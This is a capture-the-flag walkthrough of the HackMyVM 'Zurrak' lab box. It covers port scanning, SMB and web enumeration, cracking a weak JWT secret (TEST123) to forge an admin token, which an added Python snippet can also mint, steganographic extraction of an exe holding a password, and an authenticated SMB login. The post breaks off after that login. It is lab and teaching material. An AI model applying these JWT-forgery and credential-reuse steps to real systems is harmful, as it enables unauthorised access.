
[HackMyVM] Zurrak box - port scan

最编程 2024-04-03 07:27:30
...
# nmap -sV -A 192.168.56.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-30 16:59 CST
Nmap scan report for 192.168.56.140
Host is up (0.00039s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
| http-title: Login Page
|_Requested resource was login.php
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
5432/tcp open  postgresql  PostgreSQL DB 9.6.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=zurrak
| Subject Alternative Name: DNS:zurrak
| Not valid before: 2023-10-20T19:29:16
|_Not valid after:  2033-10-17T19:29:16
| fingerprint-strings: 
|   SMBProgNeg: 
|     SFATAL
|     VFATAL
|     C0A000
|     Munsupported frontend protocol 65363.19778: server supports 3.0 to 3.0
|     Fpostmaster.c
|     L2195
|_    RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.94SVN%I=7%D=3/30%Time=6607D461%P=x86_64-pc-linux-gnu%r
SF:(SMBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fron
SF:tend\x20protocol\x2065363\.19778:\x20server\x20supports\x203\.0\x20to\x
SF:203\.0\0Fpostmaster\.c\0L2195\0RProcessStartupPacket\0\0");
MAC Address: 08:00:27:62:31:5D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

Host script results:
| smb2-time: 
|   date: 2024-03-30T16:59:18
|_  start_date: N/A
|_clock-skew: 7h59m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.56.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds

Four ports are open: 80, 139, 445 and 5432. There is no 22 (SSH).

First, enumerate SMB.

# enum4linux 192.168.56.140
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 30 17:03:12 2024

 =========================================( Target Information )=========================================                                                                                     
                                                                                               
Target ........... 192.168.56.140                                                              
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.56.140 )===========================                                                                                     
                                                                                               
                                                                                               
[E] Can't find workgroup/domain                                                                
                                                                                               
                                                                                               

 ===============================( Nbtstat Information for 192.168.56.140 )===============================                                                                                     
                                                                                               
Looking up status of 192.168.56.140                                                            
No reply from 192.168.56.140

 ==================================( Session Check on 192.168.56.140 )==================================                                                                                      
                                                                                               
                                                                                               
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests. 
                                                                                              

Nothing came of it.

A quick directory scan.

# gobuster dir -u http://192.168.56.140   -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.140
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 302) [Size: 1270] [--> login.php]
/.html                (Status: 403) [Size: 279]
/login.php            (Status: 200) [Size: 2041]
/admin.php            (Status: 302) [Size: 2625] [--> login.php]
/vendor               (Status: 301) [Size: 317] [--> http://192.168.56.140/vendor/]
/index_.php           (Status: 200) [Size: 200]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 346965 / 1323366 (26.22%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 347585 / 1323366 (26.27%)
===============================================================
Finished
===============================================================

We can see the files login.php, admin.php and index_.php, so a login is presumably required.

Take a look at the web page.

A plain login page; the page source gives away the credentials.

username:internal@zurrak.htb && password:testsite

After logging in the page is blank, so check the source.

It automatically redirects back to index.php.

Remembering that the directory scan turned up index_.php, I went to look at it.

At first glance it looks like base64, but it is actually a JWT.

Not yet clear what it is for.

Back on index.php, intercepting the request shows a token in the cookie that is also a JWT; decode it.

This one is different: it carries an extra isAdmin claim.

So brute-force the JWT secret with jwt_tool.

The recovered key is TEST123.

Then forge a JWT.

Use this token to access admin.php.
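An added example, not code from the original post, showing why the weak HS256 secret found above matters and what a verifier has to check: it decodes a token without verification (as done with index_.php and the cookie), audits the token against a wordlist the way jwt_tool's crack mode does, and shows that a strict verifier with a strong secret rejects a token minted with TEST123. The claims and wordlist are constructed for the example; only the key TEST123 comes from the box.

```python
# Added example, not from the original post: audit an HS256 JWT for a weak secret
# (the box's key TEST123) and show what a strict verifier must check.
import base64, hashlib, hmac, json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_token(payload: dict, secret: str) -> str:
    """Mint an HS256 JWT; this is the construction the app on the box relies on."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def decode_unverified(token: str):
    """Read header and claims without checking the signature (what the post does with the two tokens)."""
    h, p, _ = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def verify(token: str, secret: str):
    """Strict verifier: HS256 only, constant-time compare; returns the claims or None."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        return None
    if json.loads(b64url_decode(h)).get("alg") != "HS256":  # reject alg=none / algorithm confusion
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def audit_weak_secret(token: str, wordlist):
    """Defender-side check, the same idea as jwt_tool's crack mode: does any wordlist entry validate the token?"""
    return next((c for c in wordlist if verify(token, c) is not None), None)


# Constructed sample: claims modelled on the cookie seen on the box, signed with the weak key TEST123.
SAMPLE = make_token({"username": "internal@zurrak.htb", "isAdmin": False}, "TEST123")
WORDLIST = ["password", "secret", "changeme", "TEST123"]
```

A token that `audit_weak_secret` cracks from a small wordlist lets anyone mint their own `isAdmin: true` cookie, which is exactly what happens on this box; the fix is a long random secret plus a verifier that pins the algorithm as `verify` does.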

please don't ever use these images for file transfers!!!

The steganography hint is thrown right in your face.

An exe file is hidden in the third image.

# stegseek zurrakhearts.jpg 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""

[i] Original filename: "asli.exe".
[i] Extracting to "zurrakhearts.jpg.out".

Load it into IDA64 and decompile it.

Converting the data to a string reveals ilovecats.

Now there is a password but no username; my guess is the exe filename, asli.

Try connecting over SMB.

┌──(root㉿kali2)-[~/Desktop]
└─# smbclient //192.168.56.140/share -U asli --password ilovecats
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Oct 21 05:14:00 2023
  ..                                  D        0  Sat Oct 21 04:36:51 2023
  DONTDELETE                          D        0  Sat Oct 21 11:44:44 2023
  operations                          D        0  Sat Oct 21 12:04:30 2023
  backup.reg                          N     1792  Sun Jul 24 13:30:09 2011
  human_resources                     D        0  Sun Apr  2 13:30:09 2017
  launch_options.txt                  N       21  Wed Dec 14 11:55:16 2022

                9232860 blocks of size 1024. 6208916 blocks available

Connection successful. (I could not do the rest on my own; I followed a writeup for it and am recording that too.)